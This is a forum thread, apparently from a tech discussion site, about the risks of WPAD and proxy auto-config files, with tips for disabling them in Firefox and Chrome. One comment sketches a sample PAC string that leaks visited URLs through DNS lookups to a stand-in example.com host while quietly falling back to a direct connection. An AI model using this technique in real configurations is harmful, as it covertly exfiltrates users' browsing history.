1: https://en.wikipedia.org/wiki/Proxy_auto-config
Edit: note that in addition to SOCKS proxies, this also allows one to provide HTTP proxies. I'm not familiar with the interaction of https traffic with HTTP proxies, but I'd hope browsers avoid using them? Anyone familiar with this care to comment? (specs are sparse in this area)
So much of this Netscape stuff just reeks of a "startup MVP", to put it mildly.
So DHCP can cause my browser to execute code. That is … completely and totally insane. I'm not saying you're wrong, but rather that you're right about about a world gone mad.
Menu > Preferences > Advanced > Network > Settings… > No Proxy.
Very simple and easily discoverable setting.
________________________
Google Chrome uses your OS's settings for proxy, though, so you can't easily turn it off in most cases, but you can go toSettings (scroll down a page) > Advanced Settings > Network > Configure System Proxy Settings
(that redirects you to the system settings for proxies, usually).
"No Proxy": 0 "Auto-detect proxy settings for this network": 4 "Use system proxy settings": 5 "Manual proxy configuration": 1 "Automatic proxy configuration URL": 2
Does anyone know if it's possible to force unpatched libproxy on Linux to not use WPAD? Also, does network-manager use libproxy if I don't have libproxy1-plugin-networkmanager installed?
Setting network settings is exactly what DHCP was for.
Edit: even with sandboxing, I imagine they could encode the url into a hostname for a proxy and then use the DNS requests for the proxy to exfiltrate the url. Proxy auto-config allows specifying "PROXY my_encoded_url.other_data.example.com:8080; DIRECT" so that it would attempt the DNS lookup, and on it's failure fallback to using a direct connection so there wouldn't be much change visible to the user (just a slight extra delay due to dns lookup).
I don't think so. Just a proxy. A malicious proxy can of course inject whatever it wants into your viewed pages.
This is separate from the proxy that then gets used for the actual connection if the PAC file says to use a proxy. That proxy can't inject things into pages loaded over https unless it's using an MITM cert signed with a trust root that your browser trusts.
The problem under discussion is that the function in the PAC file gets to see the URL being visited.
Yes. In Firefox, the "network.proxy.type" preference is an integer that can take on the values 0, 1, 2, 3, 4, 5 with the following meanings:
0,3: no proxy (see https://bugzilla.mozilla.org/show_bug.cgi?id=115720 for the history on why 3 is the same as 0)
1: proxy manually configured in Firefox preferences, no PAC file.
2: Use the PAC file found at the URL given by the value of the "network.proxy.autoconfig_url" preference.
4: Use WPAD to get the PAC file.
5: Do whatever the OS says to do in terms of proxy settings (including what PAC file to use, if any).
The default value is 5. I believe setting the preference to 0 will ensure that you always use a direct, not proxied, connection to the target site, and in particular that no PAC file is used.
Edit: Ah, just noticed that kuschku points to UI for all this stuff below too.